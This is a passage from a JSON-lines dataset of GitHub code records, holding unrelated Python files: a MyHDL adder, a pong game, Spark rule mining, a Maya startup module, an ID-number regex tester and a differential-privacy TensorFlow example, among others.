content_type=\"application/json\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Dorfeuheinz/socio","sub_path":"follow/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"31176624876","text":"from myhdl import *\nfrom random import randrange\n\n@block\ndef bit_adder(oper_a, oper_b, res_sum, oper_cin, oper_cout):\n\n\t@always_comb\n\tdef logic():\n\t\tfor i in range(5):\n\t\t\tres_sum.next[i] = oper_a[i] ^ (oper_b[i] ^ oper_cin)\n\t\t\toper_cout.next = (oper_a[i] & oper_b[i]) | (oper_a[i] & oper_cin) | (oper_b[i] & oper_cin) # carry-out is the majority of a, b and cin\n\n\treturn instances()\n\ndef testbench():\n\toper_a, oper_b = [Signal(intbv(0)[5:]) for i in range(2)]\n\toper_cin, oper_cout = [Signal(bool()) for i in range(2)]\n\n\toper_sum = Signal(intbv(0)[5:])\n\tprocess = bit_adder(oper_a, oper_b, oper_sum, oper_cin, oper_cout)\n\n\t@always_comb\n\tdef update_cin():\n\t\toper_cin.next = oper_cout\n\n\t@instance\n\tdef stimulus():\n\t\tfor i in range(20):\n\t\t\toper_a.next, oper_b.next = randrange(16), randrange(16)\n\t\t\tyield delay(1)\n\t\t\tprint (oper_a, oper_b, oper_sum)\n\t\t\tprint (bin(oper_a), bin(oper_b), bin(oper_sum), oper_cin)\n\t\t\tprint (\"\")\n\n\n\treturn instances()\n\ninst = testbench()\nsim = Simulation(inst)\nsim.run(50)\n","repo_name":"abhisheietk/MyHDL_tutorial","sub_path":"fulladder.py","file_name":"fulladder.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26908393655","text":"from turtle import Turtle\r\nimport random\r\n\r\nMOVE_DISTANCE = 10\r\nDIRECTION = [45, 135, 225, 315]\r\nSPEED = 'slowest'\r\n\r\nclass Ball(Turtle):\r\n\r\n    def __init__(self):\r\n        super().__init__()\r\n        self.shape('square')\r\n        
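# --- Editor's illustration (not part of the MyHDL record above): the full-adder
# equations used there, sum = a ^ b ^ cin and cout = majority(a, b, cin), can be
# sanity-checked exhaustively in plain Python against the one-bit arithmetic identity.
from itertools import product

for a, b, cin in product((0, 1), repeat=3):
    s = a ^ b ^ cin                           # sum bit
    cout = (a & b) | (a & cin) | (b & cin)    # carry-out (majority function)
    assert a + b + cin == s + 2 * cout        # a + b + cin equals {cout, s} in binary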
self.color('white')\r\n self.penup()\r\n self.speed(SPEED)\r\n self.shapesize(0.5, 0.5, 0.5)\r\n\r\n\r\n def start_game(self):\r\n self.goto(0, 0)\r\n start_direction = random.choice(DIRECTION)\r\n self.setheading(start_direction)\r\n\r\n\r\n def move(self):\r\n self.forward(MOVE_DISTANCE)\r\n","repo_name":"quici9/pong-game","sub_path":"ball.py","file_name":"ball.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26170276637","text":"from itertools import combinations\nfrom pathlib import Path\n\nfrom pyspark.sql import SparkSession\n\nfrom src.apriori import get_apriori_rules_and_dictionary\nfrom src.fpgrowth import get_fp_growth_rules_and_dictionary\nfrom src.measures import get_confidence, get_lift, get_conviction\n\nthreshold = 50\napriori_iterations = 3\n\n\ndef get_data_rdd(session, file_name):\n rdd = session.sparkContext.textFile('../resources/' + file_name + '.txt').map(lambda x: x.split(\",\"))\n return rdd\n\n\ndef get_rule_string(antecedent, consequent):\n antecedent_list = list(antecedent)\n consequent_list = list(consequent)\n antecedent_list.sort()\n consequent_list.sort()\n result = ' '.join('<{}>'.format(i) for i in antecedent_list)\n result = result + \" [\" + ' '.join('<{}>'.format(i) for i in consequent_list) + \"] \"\n return result\n\n\ndef save_rules(support_dictionary, get_measure, result_file_name, rules):\n association_rules_measures = list(map(lambda x: (x, get_measure(support_dictionary, x[0], x[1]),\n get_rule_string(x[0], x[1])), rules))\n association_rules_measures.sort(key=lambda x: (-x[1], x[2]))\n Path(\"../resources/\").mkdir(parents=True, exist_ok=True)\n for rule_measure in association_rules_measures:\n rule_size = len(rule_measure[0][0]) + len(rule_measure[0][1])\n with open('../resources/' + result_file_name + str(rule_size) + '.txt', 'a') as f:\n f.write(rule_measure[2] + \" <\" + str(rule_measure[1]) + \">\\n\")\n\n\nif __name__ == \"__main__\":\n spark_session = SparkSession.builder.getOrCreate()\n data_rdd = get_data_rdd(spark_session, 'users_genres')\n association_rules, support_dictionary = get_apriori_rules_and_dictionary(data_rdd, apriori_iterations, threshold)\n save_rules(support_dictionary, get_confidence, 'confidence_results_new', association_rules)\n save_rules(support_dictionary, get_lift, 'lift_results_new', association_rules)\n save_rules(support_dictionary, get_conviction, 'conviction_results_new', association_rules)\n\n association_rules = get_fp_growth_rules_and_dictionary(data_rdd, threshold)\n save_rules(support_dictionary, get_confidence, 'confidence_results_fp', association_rules)\n save_rules(support_dictionary, get_lift, 'lift_results_fp', association_rules)\n save_rules(support_dictionary, get_conviction, 'conviction_results_fp', association_rules)\n\n print('found rules...')","repo_name":"MateuszKuzniarek/SteamProject","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41493051863","text":"import numpy as np\nimport torch\n\nfrom utils.common_utils import check_numpy_to_torch\n\n\ndef rotate_points_along_z(points, angle):\n \"\"\"\n\n Args:\n points: ndarray, [B, N, 3 + C]\n angle: ndarray, [B], angle along z-axis, angle increases x ==> y\n\n Returns:\n\n \"\"\"\n points, is_numpy = check_numpy_to_torch(points)\n angle, _ = check_numpy_to_torch(angle)\n\n cosa = 
torch.cos(angle)\n sina = torch.sin(angle)\n zeros = angle.new_zeros(points.shape[0])\n ones = angle.new_ones(points.shape[0])\n rot_matrix = torch.stack((\n cosa, sina, zeros,\n -sina, cosa, zeros,\n zeros, zeros, ones\n ), dim=1).view(-1, 3, 3).float()\n points_rot = torch.matmul(points[:, :, 0:3], rot_matrix)\n points_rot = torch.cat((points_rot, points[:, :, 3:]), dim=-1)\n\n return points_rot.numpy() if is_numpy else points_rot\n\n\ndef mask_points_by_range(points, limit_range):\n \"\"\"\n\n Args:\n points: ndarray, [N, 3 + C]\n limit_range: (xmin, ymin, zmin, xmax, ymax, zmax)\n\n Returns:\n\n \"\"\"\n mask = (points[:, 0] >= limit_range[0]) & (points[:, 0] <= limit_range[3]) \\\n & (points[:, 1] >= limit_range[1]) & (points[:, 1] <= limit_range[4])\n\n return points[mask]\n\n\ndef get_fov_flag(points, image_shape, calib):\n \"\"\"\n\n Args:\n points: ndarray, [N, 3 + C]\n image_shape: ndarray, [2], H and W\n calib: kitti_calibration_utils.Calibration\n\n Returns:\n\n \"\"\"\n pts_rect = calib.lidar_to_rect(points[:, 0:3])\n pts_img, pts_rect_depth = calib.rect_to_img(pts_rect)\n\n val_flag_1 = np.logical_and(pts_img[:, 0] >= 0, pts_img[:, 0] < image_shape[1])\n val_flag_2 = np.logical_and(pts_img[:, 1] >= 0, pts_img[:, 1] < image_shape[0])\n val_flag_merge = np.logical_and(val_flag_1, val_flag_2)\n\n mask = np.logical_and(val_flag_merge, pts_rect_depth >= 0)\n\n return mask\n","repo_name":"shangjie-li/mvmm","sub_path":"utils/point_cloud_utils.py","file_name":"point_cloud_utils.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"} +{"seq_id":"11634503718","text":"#\n# @lc app=leetcode.cn id=23 lang=python3\n#\n# [23] 合并K个升序链表\n#\n\n# @lc code=start\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\n\nfrom heapq import heappush, heappop\n\nclass Solution:\n def mergeKLists(self, lists: List[ListNode]) -> ListNode:\n heap = list()\n for cur_ind, cur_node in enumerate(lists):\n if cur_node is not None:\n heappush(heap, (cur_node.val, cur_ind, cur_node))\n \n head = ListNode()\n cur_node = head\n \n while len(heap) > 0:\n _, cur_list_ind, cur_min_node = heappop(heap)\n cur_node.next = cur_min_node\n cur_node = cur_min_node\n \n if cur_min_node.next is not None:\n heappush(heap, (cur_min_node.next.val, cur_list_ind, cur_min_node.next))\n \n return head.next\n \n \n# @lc code=end\n\n","repo_name":"HawChang/LeetCode","sub_path":"23.合并k个升序链表.py","file_name":"23.合并k个升序链表.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26126464458","text":"import os\r\nimport cv2\r\n\r\npath = 'images'\r\nimages = []\r\n\r\nfor file in os.listdir(path):\r\n name, ext = os.path.splitext(file)\r\n\r\n if ext in ['.png', '.jpeg', '.jfif', '.jpg']:\r\n images.append(path + '/' + file)\r\n \r\n\r\nframe = cv2.imread(images[0])\r\nheight, width, channels = frame.shape\r\nsize = (width, height)\r\nfps = 0.5\r\n\r\nvideoWrite = cv2.VideoWriter(\"Project Output.mp4\", cv2.VideoWriter_fourcc(*'mp4v'), fps, size)\r\nfor i in range(0, len(images), 1):\r\n frame = cv2.imread(images[i])\r\n 
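# each saved image becomes one frame of the output video\r\n 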
videoWrite.write(frame)\r\n\r\nvideoWrite.release()\r\nprint(\"Done!\")","repo_name":"dhairyapolkundwar/PRO-C105","sub_path":"CreateVideo.py","file_name":"CreateVideo.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28160018526","text":"import realtimeInputTest as realtime\nimport pyaudio\nfrom pydub import AudioSegment\nfrom pydub.playback import play\n\nsound1 = AudioSegment.from_file(\"moonlight_sonata.wav\")\nsound1_channels = sound1.split_to_mono()\nsound1 = sound1_channels[0].overlay(sound1_channels[1])\nsound1 = sound1 - 30 # make sound1 quiter 30dB so that noise is clearly hearable\n\n\nMODE = \"NOISE_CANCELING_ON\"\n\nFORMAT = pyaudio.paInt16\nCHANNELS = 1\nRATE = 44100\nCHUNK = 1024\n\n\naudio = pyaudio.PyAudio()\naudio2 = pyaudio.PyAudio()\n\nplayer = audio.open(format=FORMAT, channels=CHANNELS, rate=RATE, output=True, frames_per_buffer=CHUNK)\nplayer2 = audio2.open(format=FORMAT, channels=CHANNELS, rate=RATE, output=True, frames_per_buffer=CHUNK)\n\nMICROPHONENAME = \"Realtek High Defini\"\nMICROPHONEINDEX = 2\n\nMICROPHONENAME2 = \"Realtek High Defini\"\nMICROPHONEINDEX2 = 2\n\ndef main():\n realtime.micro_selection(MICROPHONEINDEX, MICROPHONENAME, audio)\n realtime.audio_recording(audio, MODE)\n\nif __name__ == \"__main__\":\n main()","repo_name":"Haegar98/Embedded-Systems","sub_path":"Src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41065341948","text":"\"\"\"Evaluator controller.\"\"\"\n\n# You may need to import some classes of the controller module. Ex:\n# from controller import Robot, Motor, DistanceSensor\nfrom controller import Supervisor\nfrom reward_function import *\n\nsupervisor = Supervisor()\n\n# get the time step of the current world.\ntimestep = 64\n\nilegal_contacts = {('bot_red', 'bot_blue'): -20}\n\nblock_nodes = []\nfor i in range(4):\n block_node = supervisor.getFromDef('Block_R' + str(int(i+1)))\n block_nodes.append(block_node)\n ilegal_contacts[('bot_blue','Block_R' + str(int(i+1)))] = -5\nfor i in range(4):\n block_node = supervisor.getFromDef('Block_B' + str(int(i+1)))\n block_nodes.append(block_node)\n ilegal_contacts[('bot_red','Block_B' + str(int(i+1)))] = -5\n\nrobot_nodes = [supervisor.getFromDef('bot_red'), supervisor.getFromDef('bot_blue')]\n\n\nprev_grid_score = 0 \ntotal_reward = 0 \ni =0\n# Main loop:\n# - perform simulation steps until Webots is stopping the controller\nwhile supervisor.step(timestep) != -1:\n i +=1\n time = i*timestep/1000\n current_reward, curr_grid_score = step_reward(robot_nodes, block_nodes, ilegal_contacts, prev_grid_score, time, supervisor)\n total_reward += current_reward\n current_collisions = collisions(robot_nodes, block_nodes, ilegal_contacts, supervisor)\n print(f\"reward: {current_reward}, total_reward: {total_reward}, collisions: {current_collisions}\")\n prev_grid_score = curr_grid_score\n if done(time, robot_nodes, block_nodes):\n supervisor.simulationSetMode(0)\n\n# Enter here exit cleanup code.\n","repo_name":"Sahil177/RobotRL","sub_path":"Normalworld/controllers/Evaluator/Evaluator.py","file_name":"Evaluator.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35543791308","text":"from mrjob.job import MRJob\nfrom mrjob.step import MRStep\n\nclass 
MRWorstRatingDay(MRJob):\n\n def mapper(self, _, line):\n user, movie, rating, genre, date = line.split(',')\n yield date, float(rating)\n\n def reducer(self, date, ratings):\n ratings_list = list(ratings)\n if ratings_list:\n yield None, (date, sum(ratings_list) / len(ratings_list))\n else:\n yield None, (date, 0)\n\n def reducer_find_worst_day(self, _, date_avg_rating_pairs):\n worst_day = min(date_avg_rating_pairs, key=lambda x: x[1])\n yield 'Worst rating day', worst_day\n\n def steps(self):\n return [\n MRStep(mapper=self.mapper,\n reducer=self.reducer),\n MRStep(reducer=self.reducer_find_worst_day)\n ]\n\nif __name__ == '__main__':\n MRWorstRatingDay.run()\n","repo_name":"jgomezb11/reto5-TET","sub_path":"reto3/WorstDay.py","file_name":"WorstDay.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37817535394","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nModule that contains tp-dcc-maya startup functionality\n\"\"\"\n\nfrom __future__ import annotations\n\nimport os\nimport sys\nimport typing\nimport inspect\nimport logging\n\nimport maya.cmds as cmds\nfrom maya.api import OpenMaya\n\nfrom tp.core import dcc\nfrom tp.bootstrap import log\nfrom tp.bootstrap.utils import env, profile\nfrom tp.bootstrap.core import manager, exceptions as bootstrap_exceptions\nfrom tp.common.python import path\nfrom tp.common.resources import api as resources\nfrom tp.maya.meta import base\n# from tp.maya.managers import scene\nfrom tp.maya.plugins import loader\nfrom tp.maya.libs.triggers import markingmenuoverride, triggercallbacks\n\nif typing.TYPE_CHECKING:\n from tp.bootstrap.core.package import Package\n\nORIGINAL_FORMAT_EXCEPTION = None\n\n\n@profile.profile\ndef startup(_: Package):\n \"\"\"\n This function is automatically called by tpDcc packages Manager when environment setup is initialized.\n \"\"\"\n\n root_file_path = path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))\n package = manager.package_from_path(root_file_path)\n if not package:\n raise bootstrap_exceptions.MissingPackage(package)\n\n logger = setup_logging()\n\n logger.info('Loading tp-dcc DCC Package: Maya')\n\n resources_path = path.join_path(os.path.dirname(root_file_path), 'resources')\n resources.register_resource(resources_path)\n dcc.register_resource_path(resources_path)\n\n try:\n if env.is_mayapy() or env.is_maya_batch():\n logger.debug('Not in maya.exe, skipping tp-dcc-tools menu loading...')\n else:\n from tp.core.managers import tools\n tools.ToolsManager.load(application_name='maya')\n logger.debug('Finished loading tp-dcc-tools framework Maya tools!')\n except Exception:\n logger.error('Failed to load tp-dcc-tools framework Maya tools due to unknown error', exc_info=True)\n\n # load tp-dcc-maya plugins\n loader.load_all_plugins()\n\n # initialize metadata manager\n base.MetaRegistry()\n\n # setup custom marking menu and callbacks\n markingmenuoverride.setup()\n triggercallbacks.create_selection_callback()\n\n # # setup scene manager\n # scene.SceneManager()\n\n\ndef shutdown(package: Package):\n \"\"\"\n Shutdown function that is called during tpDcc framework shutdown.\n This function is called at the end of tpDcc framework shutdown.\n\n :param Package package: package instance.\n \"\"\"\n\n if not package:\n raise bootstrap_exceptions.MissingPackage(package)\n\n logger = log.tpLogger\n\n logger.info('Shutting down tp-dcc-maya Package...')\n\n # # unload scene manager\n # 
scene.SceneManager().stop_all_jobs()\n\n # reset custom marking menu\n triggercallbacks.remove_selection_callback()\n markingmenuoverride.reset()\n\n # unload tp-dcc-maya plugins\n loader.unload_all_plugins()\n\n if env.is_maya():\n from tp.core.managers import tools\n try:\n tools.ToolsManager.close()\n except Exception:\n logger.error('Failed to shutdown currently loaded tools', exc_info=True)\n\n cmds.flushUndo()\n\n\ndef setup_logging():\n \"\"\"\n Setup custom Maya logging\n \"\"\"\n\n handler = MayaLogHandler()\n handler.setFormatter(logging.Formatter(log.LogsManager().shell_formatter))\n log.tpLogger.addHandler(handler)\n log.rigLogger.addHandler(handler)\n log.animLogger.addHandler(handler)\n log.modelLogger.addHandler(handler)\n\n return log.tpLogger\n\n\nclass MayaLogHandler(logging.Handler):\n \"\"\"\n Custom logging handler that displays errors and warnings records with the appropriate color within Maya GUI\n \"\"\"\n\n def emit(self, record: logging.LogRecord) -> None:\n msg = self.format(record)\n if record.levelno > logging.WARNING:\n OpenMaya.MGlobal.displayWarning(msg)\n elif record.levelno in (logging.CRITICAL, logging.ERROR):\n OpenMaya.MGlobal.displayError(msg)\n else:\n # Write all messages to sys.__stdout__, which goes to the output window. Only write debug messages here.\n # The script editor is incredibly slow and can easily hang Maya if we have a lot of debug logging on,\n # but the output window is reasonably fast.\n sys.__stdout__.write(f'{msg}\\n')\n","repo_name":"tpoveda/tp-dcc-tools","sub_path":"packages/tp-dcc-maya/startup/tpmaya.py","file_name":"tpmaya.py","file_ext":"py","file_size_in_byte":4320,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"19880421797","text":"# 测试18位的身份证号\nimport re\nimport time\nimport datetime\n\nclass JudgeRegExpOf18IDCardNumber:\n def __init__(self):\n self.year = 1800 # 年\n self.month = 1 # 月\n self.date = 1 # 日\n self.bigMonth = [1, 3, 5, 7, 8, 10, 12] # 大月\n self.samllMonth = [4, 6, 9, 11] # 小月\n self.judgeString = \"18000100\"\n self.ID = \"0000180001000000\"\n self.numOfJudgeWrong = 0\n self.numofWrongDate = 0\n self.numofAll = 0\n # 由于数据量过于庞大,删了,只测试 452722\n # self.preffixs=[str(preffix).zfill(6) for preffix in range(1000000)] #身份证号前六位\n # 身份证号码后四位\n self.suffixs = [str(suffix).zfill(4) for suffix in range(10000)]+[str(suffix).zfill(\n 3)+'X' for suffix in range(1000)]+[str(suffix).zfill(3)+'x' for suffix in range(1000)]\n self.file = open(\"./input18.txt\", 'a') # 打开文件\n self.judge = None\n # 编译正则\n self.pattern = re.compile(\n r'^[1-9]\\d{5}((18|19|20|21)([0-9]{2}))(02(0[1-9]|[1-2][0-9])|(01|03|05|07|08|10|12)(0[1-9]|[1-2][0-9]|3[0-1])|(04|06|09|11)(0[1-9]|[1-2][0-9]|30))\\d{3}[Xx\\d]$')\n\n def addSelf(self): # 日期向前加1\n self.date += 1\n\n def generateRightDate(self): # 这是生成正确的日期\n if self.month == 2:\n if self.judgeYear():\n if self.date > 29:\n self.date = 1\n self.month += 1\n else:\n if(self.date > 28):\n self.date = 1\n self.month += 1\n elif (self.month in self.bigMonth):\n if(self.date > 31):\n self.date = 1\n self.month += 1\n elif self.month in self.samllMonth:\n if self.date > 30:\n self.date = 1\n self.month += 1\n if self.month > 12:\n self.month = 1\n self.year += 1\n return\n\n def generateAllDate(self): # 生成所有的日期\n if(self.date > 31):\n self.month += 1\n self.date = 0\n if(self.month > 12):\n self.year += 1\n self.month = 1\n return\n # 闰年判断\n\n def judgeYear(self):\n if((self.year % 400 == 0) or ((self.year % 100 != 0) and (self.year % 4 == 
0))):\n return True\n else:\n return False\n\n def print(self):\n print(str(self.year)+' '+str(self.month).zfill(2) +\n \" \"+str(self.date).zfill(2))\n return\n\n def getString(self):\n return str(self.year).zfill(4)+str(self.month).zfill(2)+str(self.date).zfill(2)\n\n def judgeStop(self):\n if self.year >= 2200:\n exit(0)\n\n def resetDate(self):\n self.year = 1800\n self.month = 1\n self.date = 0\n\n def validateDate(self):\n if(self.month == 2):\n if self.date < 30 and self.date != 0:\n return True\n else:\n return False\n elif self.month in self.bigMonth:\n if self.date < 32 and self.date != 0:\n return True\n else:\n return False\n elif self.month in self.samllMonth:\n if self.date < 31 and self.date != 0:\n return True\n else:\n return False\n\n def run(self):\n # 由于测试数据过多,我们只进行分段测试,也就是前六位做一段,7-14位一段 15-18位一段\n #又由于实际,我只是测试了7-14年和日期这一段,你也可以补充加入别的测试内容,但是要注意测试的内存占用和运行时间。\n while(self.year < 2200):\n if not self.validateDate():\n self.numofWrongDate += 1\n self.numofAll += 1\n self.ID = \"452722\"+self.getString()+\"0000\"\n self.judge = self.pattern.match(self.ID)\n if self.judge == None:\n self.numOfJudgeWrong += 1\n # self.file.write(self.ID+'\\n')\n self.addSelf()\n self.generateAllDate()\n # self.resetDate()\n self.file.write(\"总数:\"+str(self.numofAll) +\n \" 判断错误数:\"+str(self.numOfJudgeWrong)+\" 事实错误数:\"+str(self.numofWrongDate)+\"\\n\")\n self.file.close()\n\n\nprint(\"开始测试......\")\ntest = JudgeRegExpOf18IDCardNumber()\nstart = time.time()\ntest.run()\nend = time.time()\nperiod = (end-start)\nprint(\"测试结束,共计用时\"+str(period)+\"s。\")\n","repo_name":"zerotower69/javascript-html-css","sub_path":"day03/测试文件/test18.py","file_name":"test18.py","file_ext":"py","file_size_in_byte":4559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35916786774","text":"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom absl import app\nfrom absl import flags\n\nimport numpy as np\nimport numpy.random as npr\nimport tensorflow as tf\n\nfrom tensorflow_privacy.privacy.analysis import privacy_ledger\nfrom tensorflow_privacy.privacy.analysis.rdp_accountant import compute_rdp_from_ledger\nfrom tensorflow_privacy.privacy.analysis.rdp_accountant import get_privacy_spent\nfrom tensorflow_privacy.privacy.optimizers import dp_optimizer\n\nAdamOptimizer = tf.compat.v1.train.AdamOptimizer\n\nFLAGS = flags.FLAGS\n\nflags.DEFINE_boolean(\n 'dpsgd', True, 'If True, train with DP-SGD. 
If False, '\n 'train with vanilla SGD.')\nflags.DEFINE_float('learning_rate', .05, 'Learning rate for training')\nflags.DEFINE_float('noise_multiplier', 2.0,\n 'Ratio of the standard deviation to the clipping norm')\nflags.DEFINE_float('l2_norm_clip', 1.0, 'Clipping norm')\nflags.DEFINE_integer('batch_size', 64, 'Batch size')\nflags.DEFINE_integer('epochs', 2, 'Number of epochs')\nflags.DEFINE_integer('training_data_size', 2000, 'Training data size')\nflags.DEFINE_integer('test_data_size', 2000, 'Test data size')\nflags.DEFINE_integer('input_dimension', 5, 'Input dimension')\nflags.DEFINE_string('model_dir', None, 'Model directory')\n\n\nclass EpsilonPrintingTrainingHook(tf.estimator.SessionRunHook):\n \"\"\"Training hook to print current value of epsilon after an epoch.\"\"\"\n\n def __init__(self, ledger):\n \"\"\"Initalizes the EpsilonPrintingTrainingHook.\n Args:\n ledger: The privacy ledger.\n \"\"\"\n self._samples, self._queries = ledger.get_unformatted_ledger()\n\n def end(self, session):\n orders = [1 + x / 10.0 for x in range(1, 100)] + list(range(12, 64))\n samples = session.run(self._samples)\n queries = session.run(self._queries)\n formatted_ledger = privacy_ledger.format_ledger(samples, queries)\n rdp = compute_rdp_from_ledger(formatted_ledger, orders)\n eps = get_privacy_spent(orders, rdp, target_delta=1e-5)[0]\n print('For delta=1e-5, the current epsilon is: %.2f' % eps)\n\n\ndef lr_model_fn(features, labels, mode):\n \"\"\"Model function for a LR.\"\"\"\n\n # Define logistic regression model using tf.keras.layers.\n logits = tf.keras.layers.Dense(2).apply(features['x'])\n\n # Calculate loss as a vector (to support microbatches in DP-SGD).\n vector_loss = tf.nn.sparse_softmax_cross_entropy_with_logits(\n labels=labels, logits=logits)\n # Define mean of loss across minibatch (for reporting through tf.Estimator).\n scalar_loss = tf.reduce_mean(input_tensor=vector_loss)\n\n # Configure the training op (for TRAIN mode).\n if mode == tf.estimator.ModeKeys.TRAIN:\n\n if FLAGS.dpsgd:\n ledger = privacy_ledger.PrivacyLedger(\n population_size=FLAGS.training_data_size,\n selection_probability=(FLAGS.batch_size / FLAGS.training_data_size))\n\n # Use DP version of AdamOptimizer. Other optimizers are\n # available in dp_optimizer. Most optimizers inheriting from\n # tf.train.Optimizer should be wrappable in differentially private\n # counterparts by calling dp_optimizer.optimizer_from_args().\n # Setting num_microbatches to None is necessary for DP and\n # per-example gradients\n optimizer = dp_optimizer.DPAdamGaussianOptimizer(\n l2_norm_clip=FLAGS.l2_norm_clip,\n noise_multiplier=FLAGS.noise_multiplier,\n num_microbatches=None,\n ledger=ledger,\n learning_rate=FLAGS.learning_rate)\n training_hooks = [\n EpsilonPrintingTrainingHook(ledger)\n ]\n opt_loss = vector_loss\n else:\n optimizer = AdamOptimizer(learning_rate=FLAGS.learning_rate)\n training_hooks = []\n opt_loss = scalar_loss\n global_step = tf.compat.v1.train.get_global_step()\n train_op = optimizer.minimize(loss=opt_loss, global_step=global_step)\n # In the following, we pass the mean of the loss (scalar_loss) rather than\n # the vector_loss because tf.estimator requires a scalar loss. This is only\n # used for evaluation and debugging by tf.estimator. 
The actual loss being\n # minimized is opt_loss defined above and passed to optimizer.minimize().\n return tf.estimator.EstimatorSpec(mode=mode,\n loss=scalar_loss,\n train_op=train_op,\n training_hooks=training_hooks)\n\n # Add evaluation metrics (for EVAL mode).\n elif mode == tf.estimator.ModeKeys.EVAL:\n eval_metric_ops = {\n 'accuracy':\n tf.compat.v1.metrics.accuracy(\n labels=labels,\n predictions=tf.argmax(input=logits, axis=1))\n }\n\n return tf.estimator.EstimatorSpec(mode=mode,\n loss=scalar_loss,\n eval_metric_ops=eval_metric_ops)\n\ndef generate_data():\n npr.seed(4242)\n N_train = FLAGS.training_data_size\n N_test = FLAGS.test_data_size\n N = N_train + N_test\n X0 = npr.randn(N, FLAGS.input_dimension)\n temp = X0 @ npr.randn(FLAGS.input_dimension, 1) + npr.randn(N, 1)\n Y0 = np.round(1/(1+np.exp(-temp)))\n\n train_X = X0[0:N_train, :]\n test_X = X0[N_train:N, :]\n train_Y = Y0[0:N_train, 0]\n test_Y = Y0[N_train:N, 0]\n train_X = np.array(train_X, dtype=np.float32)\n test_X = np.array(test_X, dtype=np.float32)\n train_Y = np.array(train_Y, dtype=np.int32)\n test_Y = np.array(test_Y, dtype=np.int32)\n return train_X, train_Y, test_X, test_Y\n\ndef main(unused_argv):\n tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.ERROR)\n\n # Load training and test data.\n train_data, train_labels, test_data, test_labels = generate_data()\n\n # Instantiate the tf.Estimator.\n lr_classifier = tf.estimator.Estimator(model_fn=lr_model_fn,\n model_dir=FLAGS.model_dir)\n\n # Create tf.Estimator input functions for the training and test data.\n train_input_fn = tf.compat.v1.estimator.inputs.numpy_input_fn(\n x={'x': train_data},\n y=train_labels,\n batch_size=FLAGS.batch_size,\n num_epochs=FLAGS.epochs,\n shuffle=True)\n eval_input_fn = tf.compat.v1.estimator.inputs.numpy_input_fn(\n x={'x': test_data},\n y=test_labels,\n num_epochs=1,\n shuffle=False)\n\n # Training loop.\n steps_per_epoch = FLAGS.training_data_size // FLAGS.batch_size / 10\n for epoch in range(1, 10*FLAGS.epochs + 1):\n # Train the model for one epoch.\n lr_classifier.train(input_fn=train_input_fn, steps=steps_per_epoch)\n\n # Evaluate the model and print results\n eval_results = lr_classifier.evaluate(input_fn=eval_input_fn)\n test_accuracy = eval_results['accuracy']\n if (epoch % 5 == 0):\n print('Test accuracy after %.1f epochs is: %.3f' % (epoch/10, test_accuracy))\n\nif __name__ == '__main__':\n app.run(main)\n ","repo_name":"Djiffit/TML","sub_path":"2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":6824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35195686545","text":"import sys\nfrom PIL import Image\nfrom os import walk\nimport re\nimport fnmatch\nimport time\nimport os\n\nimage_files = []\n\next_filter = ['*.png']\nregex_filter = r'|'.join([fnmatch.translate(x) for x in ext_filter])\n\nfor (dirpath, dirnames, filenames) in walk(\".\"):\n\tfilenames[:] = [fname for fname in filenames if re.match(regex_filter, fname)]\n\timage_files.extend(filenames)\n\n#print(image_files)\n\nimages = map(Image.open, image_files)\nwidths, heights = zip(*(i.size for i in images))\n\ntotal_width = sum(widths)\nmax_height = max(heights)\n\nnew_im = Image.new('RGB', (total_width, max_height))\n\nx_offset = 0\nfor im in images:\n new_im.paste(im, (x_offset,0))\n x_offset += im.size[0]\n\n\ncurr_time = int(round(time.time() * 1000))\nsprite_dir = \"sprite_%s\" % (curr_time)\nsprite_filepath = \"%s/sprite.jpg\" % 
